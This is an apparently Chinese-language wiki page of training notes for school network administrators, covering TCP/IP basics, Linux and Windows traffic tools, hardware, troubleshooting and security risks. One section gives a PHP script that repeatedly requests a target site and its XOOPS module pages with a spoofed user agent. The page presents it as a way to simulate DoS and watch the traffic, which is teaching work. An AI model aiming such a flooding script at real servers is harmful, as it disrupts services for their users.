動作

NetBase-TN2016

出自 Itsmw

Lubuntu Linux 安裝



TCP/IP 概論

參考文件

文件架構

IPv4/IPv6 位址

四層式架構

通訊協定概說

實作

封包觀察

  • 用外面的 win 連線至 linux , 並用 wireshark 觀察封包變化

Linux網路工具

  • Linux上的網路工具: dns query, ping, tcptrack, iptraf, arp



Q&A

DoS攻擊我也會

用curl模擬 DoS, 再用 iptraf 或 tcptrack 觀察

#!/usr/bin/php
<?php
$argurl = "";
$argurl = $argv[1];

if( $argurl != "" ){
	for( $i=0; $i<100; $i++ ){
		// 每個 url 都得是一個獨立的 class 
		$myurl1 = "http://".$argurl;
		$myurl2 = "http://".$argurl."/modules/tadnews/";
		$myurl3 = "http://".$argurl."/modules/profile/user.php";
		echo "連線網址:".$myurl1."\n";
		
		$ch1 = curl_init();
		curl_setopt($ch1, CURLOPT_URL, $myurl1);
		curl_setopt($ch1, CURLOPT_TIMEOUT, 2);
		curl_setopt($ch1, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko');
		curl_setopt($ch1, CURLOPT_RETURNTRANSFER,1);
		$htmldata = curl_exec($ch1);
		$curl_errno = curl_errno($ch1);
		$curl_error = curl_error($ch1);
		curl_close($ch1);
		usleep(1000);
		$ch2 = curl_init();
		curl_setopt($ch2, CURLOPT_URL, $myurl2);
		curl_setopt($ch2, CURLOPT_TIMEOUT, 2);
		curl_setopt($ch2, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko');
		curl_setopt($ch2, CURLOPT_RETURNTRANSFER,1);
		$htmldata = curl_exec($ch2);
		$curl_errno = curl_errno($ch2);
		$curl_error = curl_error($ch2);
		curl_close($ch2);
		usleep(1000);
		$ch3 = curl_init();
		curl_setopt($ch3, CURLOPT_URL, $myurl3);
		curl_setopt($ch3, CURLOPT_TIMEOUT, 2);
		curl_setopt($ch3, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko');
		curl_setopt($ch3, CURLOPT_RETURNTRANSFER,1);
		$htmldata = curl_exec($ch3);
		$curl_errno = curl_errno($ch3);
		$curl_error = curl_error($ch3);
		curl_close($ch3);
		
	}
}else{
	echo "沒有輸入連線網址!\n";
}

echo "\n";
?>

對方到底是關機還是服務停了

  • 如何得知對方主機的特定通訊埠是否已開啟
  • root@lubuntu:~# telnet xxx.xxx.xxx.xxx port_number
  • 都沒事啊, 就進不去? 是不是 IPv6 在搞怪?
    http://web.tn.edu.tw/forum/?p=753



網路硬體設備簡介

各式線材規格

L2 ~ L7 Switch 簡介

  • L2 Switch Hub: 集線器
  • L3 Switch Hub: 路由器
  • L4 Switch Hub: 防火牆
  • L7 Switch Hub: IDS/IPS, 不當資訊過濾之類



佈線規劃

各校第一層D-Link 3426

其他

  • 節點愈少愈好,寧願多接點線,也不要到處都是 5 port 的 switch hub
  • 無線網路/有線網路迷思



網路不穩

資訊中心提供的工具



連國外網站不穩、很慢

<img src='http://mrtg.twaren.net/mrtg/wmap/tanet.php'>



網路斷線偵測處理,含廣播風暴

  • 善用 wireshark

全校斷了

  • 備外線,到 ping.tn.edu.tw 查詢
  • 打電話到資訊中心去問

某點斷了

  • 苦工



網路資安

Windows Wireshark



眾敵環伺

風險在那兒

  • 猜密碼
  • 惡意程式
    • 掛網路的
    • 電子郵件的
    • 主動掃描找到弱點進來的:sql injection, include injection, 某軟體開了 port ,我們卻不知道
  • P2P
  • 網內有人用不當的工具惡意下載
    • 用民間支援P2P的雲端,再用 flashget 之類暴力下載軟體硬從雲端傳回(透過 port 80 or port 21)

這台電腦開了些什麼 port

異常連線檢查

  • Linux : tcptrack, iptraf
  • Windows: TcpView



學校自建閘道器管理網路簡介